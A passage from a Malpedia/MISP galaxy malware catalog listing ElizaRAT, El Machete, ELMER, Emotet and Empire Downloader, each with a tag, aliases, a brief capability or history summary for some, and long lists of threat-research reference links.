https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks

https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/

https://unit42.paloaltonetworks.com/unit42-tracking-elirks-variants-in-japan-similarities-to-previous-attacks/

ElizaRAT

The tag is: misp-galaxy:malpedia="ElizaRAT"

ElizaRAT is also known as:

Table 3420. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.eliza_rat

https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal

El Machete APT Backdoor Dropper

This dropper masquerades itself as Adobe software, titled as Adobe.msi. It is used to executes the python written Backdoor used by this threat actor.

The tag is: misp-galaxy:malpedia="El Machete APT Backdoor Dropper"

El Machete APT Backdoor Dropper is also known as:

Table 3421. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.elmachete_dropper_2022

https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

ELMER

ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.

The tag is: misp-galaxy:malpedia="ELMER"

ELMER is also known as:

  • Elmost

Table 3422. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer

https://attack.mitre.org/software/S0064

https://www.symantec.com/security-center/writeup/2015-122210-5724-99

https://attack.mitre.org/groups/G0023

https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/

https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

Emotet

While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time. Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.

The tag is: misp-galaxy:malpedia="Emotet"

Emotet is also known as:

  • Geodo

  • Heodo

Table 3425. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/

https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html

https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/

https://unit42.paloaltonetworks.com/domain-parking/

https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure

https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/

https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/

https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/

https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html

https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html

https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/

https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/

https://twitter.com/raashidbhatt/status/1237853549200936960

https://experience.mandiant.com/trending-evil-2/p/1

https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/

https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/

https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure

https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf

https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/

https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes

https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/

https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates

https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://cyber.wtf/2021/11/15/guess-whos-back/

https://unit42.paloaltonetworks.com/emotet-command-and-control/

https://isc.sans.edu/diary/rss/27036

https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69

https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/

https://github.com/cecio/EMOTET-2020-Reversing

https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/

https://www.atomicmatryoshka.com/post/malware-headliners-emotet

https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video

https://www.hornetsecurity.com/en/threat-research/comeback-emotet/

https://threatpost.com/emotet-spreading-malicious-excel-files/178444/

https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii

https://twitter.com/eduardfir/status/1461856030292422659

https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack

https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/

https://www.youtube.com/watch?v=_BLOmClsSpc

https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques

https://forensicitguy.github.io/emotet-excel4-macro-analysis/

https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/

https://isc.sans.edu/diary/28044

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html

https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken—​the-resurgence-of-the-emotet-botnet-malw.html

https://community.riskiq.com/article/2cd1c003

https://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html

https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/

https://www.deepinstinct.com/blog/the-re-emergence-of-emotet

https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html

https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures

https://adalogics.com/blog/the-state-of-advanced-code-injections

https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/

https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled

https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf

https://blog.talosintelligence.com/emotet-switches-to-onenote/

https://www.hornetsecurity.com/en/security-information/emotet-is-back/

https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf

https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html

https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/

https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf

https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html

https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak

https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2

https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/

https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf

https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html

https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf

https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware

https://www.youtube.com/watch?v=_mGMJFNJWSk

https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf

https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html

https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/

https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/

https://securelist.com/the-chronicles-of-emotet/99660/

https://cyber.wtf/2022/03/23/what-the-packer/

https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/

https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128

https://www.lac.co.jp/lacwatch/people/20201106_002321.html

https://paste.cryptolaemus.com

https://www.cert.pl/en/news/single/analysis-of-emotet-v4/

https://www.cert.pl/en/news/single/whats-up-emotet/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion

https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/

https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return

https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/

https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf

https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/

https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/

https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/

https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://spamauditor.org/2020/10/the-many-faces-of-emotet/

https://blogs.vmware.com/security/2022/05/emotet-config-redux.html

https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/

https://www.lac.co.jp/lacwatch/alert/20211119_002801.html

https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/

https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/

https://www.youtube.com/watch?v=5_-oR_135ss

https://unit42.paloaltonetworks.com/c2-traffic/

https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis

https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/

https://persianov.net/emotet-malware-analysis-part-1

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service

https://www.youtube.com/watch?v=8PHCZdpNKrw

https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break

https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612

https://kienmanowar.wordpress.com/2022/12/19/z2abimonthly-malware-challege-emotet-back-from-the-dead/

https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/

https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89

https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction

https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/

https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://hatching.io/blog/powershell-analysis

https://medium.com/@Ilandu/emotet-unpacking-35bbe2980cfb

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://securelist.com/emotet-modules-and-recent-attacks/106290/

https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware

https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/

https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/

https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/

https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/

https://pl-v.github.io/plv/posts/Emotet-unpacking/

https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor

https://www.trendmicro.com/en_no/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html

https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf

https://github.com/d00rt/emotet_research

https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams

https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/

https://blogs.vmware.com/networkvirtualization/2022/01/emotet-is-not-dead-yet.html/

https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html

https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/

https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/

https://infosecwriteups.com/unpacking-emotet-trojan-dac7e6119a0a

https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/

https://www.us-cert.gov/ncas/alerts/TA18-201A

https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain

https://www.anomali.com/blog/mummy-spiders-emotet-malware-is-back-after-a-year-hiatus-wizard-spiders-trickbot-observed-in-its-return

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf

https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/

https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/

https://www.bitsight.com/blog/emotet-smb-spreader-back

https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/

https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet

https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/

https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles

https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html

https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/

https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/

https://cert.grnet.gr/en/blog/reverse-engineering-emotet/

https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships

https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/

https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action

https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html

https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff

https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware

https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html

https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf

https://feodotracker.abuse.ch/?filter=version_e

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/

https://persianov.net/emotet-malware-analysis-part-2

https://www.esentire.com/security-advisories/emotet-activity-identified

https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de

https://www.bleepingcomputer.com/news/security/emotet-malware-attacks-return-after-three-month-break/

https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/

https://www.tgsoft.it/files/report/download.asp?id=7481257469

https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html

https://blog.talosintelligence.com/2020/11/emotet-2020.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b

https://www.youtube.com/watch?v=q8of74upT_g

https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/

https://intezer.com/blog/research/how-hackers-use-binary-padding-to-outsmart-sandboxes/

https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/

https://intel471.com/blog/emotet-takedown-2021/

https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office

https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022

https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/

https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

https://speakerdeck.com/fr0gger/x-ray-of-malware-evasion-techniques-analysis-dissection-cure

https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf

https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol

https://research.checkpoint.com/emotet-tricky-trojan-git-clones/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage

https://www.bitsight.com/blog/emotet-botnet-rises-again

https://github.com/mauronz/binja-emotet

https://asec.ahnlab.com/en/33600/

https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html

https://d00rt.github.io/emotet_network_protocol/

https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot

https://muha2xmad.github.io/unpacking/emotet-part-2/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html

https://blog.lumen.com/emotet-redux/

https://www.youtube.com/watch?v=EyDiIAtdI

https://twitter.com/Cryptolaemus1/status/1516535343281025032

https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903

https://team-cymru.com/blog/2021/01/27/taking-down-emotet/

https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/

https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728

https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html

https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/

https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/

https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/

https://www.youtube.com/watch?v=AkZ5TYBqcU4

https://www.jpcert.or.jp/english/at/2019/at190044.html

https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html

https://blogs.cisco.com/security/emotet-is-back

https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet

http://ropgadget.com/posts/defensive_pcres.html

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/

https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html

https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/

https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers

https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5

https://www.secureworks.com/research/threat-profiles/gold-crestwood

https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/

https://isc.sans.edu/diary/rss/28254

https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html

https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros

https://unit42.paloaltonetworks.com/new-emotet-infection-method/

https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/

https://twitter.com/milkr3am/status/1354459859912192002

https://www.intrinsec.com/emotet-returns-and-deploys-loaders/

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://www.gdatasoftware.com/blog/2022/01/malware-vaccines

http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1

https://www.digitalshadows.com/blog-and-research/emotet-disruption/

https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html

https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf

https://unit42.paloaltonetworks.com/emotet-thread-hijacking/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://twitter.com/ContiLeaks/status/1498614197202079745

https://muha2xmad.github.io/unpacking/emotet-part-1/

https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/

https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns

https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx

https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/

https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection

https://threatresearch.ext.hp.com/emotets-return-whats-different/

https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/

https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure

https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/

https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/

https://www.zscaler.com/blogs/security-research/return-emotet-malware

https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation

https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://blog.threatlab.info/malware-analysis-emotet-infection/

https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf

https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/

Empire Downloader

The tag is: misp-galaxy:malpedia="Empire Downloader"

Empire Downloader is also known as:

Table 3426. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader

https://attack.mitre.org/groups/G0096

https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html

https://www.secureworks.com/research/threat-profiles/gold-drake

https://twitter.com/thor_scanner/status/992036762515050496

https://lab52.io/blog/wirte-group-attacking-the-middle-east/

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.secureworks.com/research/threat-profiles/gold-ulrick

https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/

https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf

http://www.secureworks.com/research/threat-profiles/gold-burlap

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

https://us-cert.cisa.gov/ncas/alerts/aa20-275a

https://redcanary.com/blog/getsystem-offsec/

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://paper.seebug.org/1301/

https://www.secureworks.com/research/threat-profiles/bronze-firestone

http://www.secureworks.com/research/threat-profiles/gold-heron

https://www.secureworks.com/research/threat-profiles/gold-heron
